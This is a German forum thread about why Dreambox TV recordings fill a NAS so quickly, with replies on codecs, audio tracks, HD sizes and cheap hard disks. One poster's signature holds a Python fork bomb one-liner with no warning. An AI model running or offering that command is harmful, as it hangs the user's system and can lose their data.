Aufnahmen sind riesig und schlucken immensen Speicherplatz auf dem Nas

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

• Aufnahmen sind riesig und schlucken immensen Speicherplatz auf dem Nas

Woran kann das liegen?Kann ich das irgendwie besser anpassen.
      Die selben Filme die ich mit der Dreambox aufnehme sind manchmal 3 mal so groß von der Dateigröße wie wenn ich den selben Film in gleicher Quali aus dem netz lade.
      Woran kann das liegen?

Gruß
      lumpilump
    • Das liegt wahrscheinlich an den Kompressionsverfahren der Codecs und der Bitrate des Videos.
      Für DVB gibt es da Normen, da kommen hauptsächlich MPEG-2 und das hocheffiziente H.264 zum Einsatz.

Deine illegal herunter geladen RIP's haben ganz sicher nicht die gleiche Qualität da wird nämlich nach Möglichkeit gespart damit sich die upload und download-Zeit in einem erträglichen Rahmen hält.
    • Ich meine nicht die illegalen downloads sondern wirklich die normalen Tv Sendungen die ich mit der Dreambox aufnehme um sie zu schauen.
      Wenn ich sie aber archivieren will lade ich sie extra nochmal seperat runter da ich dann wesentlich weniger Speicher verbrauche.
      Habt ihr das Problem nicht?

Gruß
      lumpilump
    • Die Dreambox nimmt eben in sehr hoher Qualität auf. Außerdem sind je nach Sender mehrere Tonspuren mit in der aufnahme wie z. B. Stereo, 5.1 AC3, evtl. auch eine Englische Tonspur oder div. andere Sprachen.
      HD Aufnahmen sind natürlich auch um einiges größer als SD Aufnahmen.

Videos aus dem Internet sind meist mit einem anderen Codec komprimiert um die Videos so klein wie möglich zu bekommen. Meist auch nur eine Tonspur.

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Gong ()

• Danke für die Antwort , nun wird mir einiges klar! :)
      Kann ich die anderen Tonspuren oder sonstigen unnötigen Ballast vermeiden?
      Ich kann die Aufnahme-Funktion so kaum nutzen da sie mir ratzfatz mein Nas zum Überfüllen bringt.
      Paar Serien haben bei mir schon 200 Gb

Gruß
      lumpilump

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von lumpilump ()

• 200GB Speicherplatz kosten heute ca. 6€. Wahrscheinlich kostet der Strom, den Dein Prozessor beim umkodieren verheizt, mehr als diese 6€.
      Von der Zeit und den Nerven will ich mal gar nicht anfangen...

Gruß,
      Laura

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Laura ()

• Original von Laura
      200GB Speicherplatz kosten heute ca. 6€. Wahrscheinlich kostet der Strom, den Dein Prozessor beim umkodieren verheizt, mehr als diese 6€.
      Von der Zeit und den Nerven will ich mal gar nicht anfangen...

Gruß,
      Laura

So Siehts aus.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • ...und vor allem bin ich froh DAS unsere Dream so gute Aufnahmen macht!

Ein Freund von mir hat die weiße HD-Box von Unitymedia. Ohh ist das Bild (Aufnahemen) gruselig im Vergleich zu meiner Dream. Nein danke, ich möchte die Schrottbox nicht haben :baby:

Und die 650 GB- oder 1 TB Platte für die Dream kostet nich einmal eine Tankfüllung 8)

Danke Dream-Multimedia
    • Bei mir geht auch nix mehr ohne die Dreambox, aber ich was bei mir das Problem macht sind ,ist die Verwaltung der Festplatten.
      Mein Nas mit 2 Festplatten von Qnap hat schon fast 400,- euro gekostet und da ich 2 Dreamboxen (Wohn- und Schlafzimmer)
      habe würde ich es schon gerne komfortabel haben und die Sammlung meiner Filme auf dem Nas bunkern.
      Aber wenn die Aufnahmen so viel Speicherplatz fressen, ist die Kapazität des Nas ratzfatz erschöpft.
      Vielleicht muss ich wirklich auf die externe Lösung umsteigen und die PLatte vom Schlafzimmer zum Wohnzimmer wandern lassen.
      Dank euch für die Antworten und ich wünsche uns weiterhin viel Spaß mit der Dreambox......
      Gruß
      lumpilump
    • Das einzige Problem bei QNAP ist das ewig lange aufspeien der Daten....gääääääääääähhhhhn. Ansonsten sind die Teile echt klasse. Kann natürlich jetzt nich wissen welche Du hast. Aber stopf doch einfach 2 x 2 TB rein. dann kannst Du echt viel "bunkern".

Ich habe jetzt keine NAS dran, da mein PC eh den ganzen Tag läuft (wenn ich zu Hause bin) daher spiele ich fast alle Filme vom PC ab...über CIFS. Klappt perfekt. Gut NFS soll noch besser funktionieren, aber ich habe per CIFS keinerlei Probleme.

Hab da 6 Terrabyte (3 x 2 TB) drinne...da passen vieeeele Filme drauf. Und HD-Filme spielt die Box ja auch perfekt ab (bei mir sieht das so aus: 90% MKV-Container, der Rest ist gemischt MPG, VOB, AVI, usw.).

Aufnahmen laufen allerding bei mir direkt auf die inter Platte der Dream. Wenn ich davon etwas archivieren möchte, dann kopiere ich das auf den PC um.

Und Festplatten sind ja so unglaublich billig geworden :]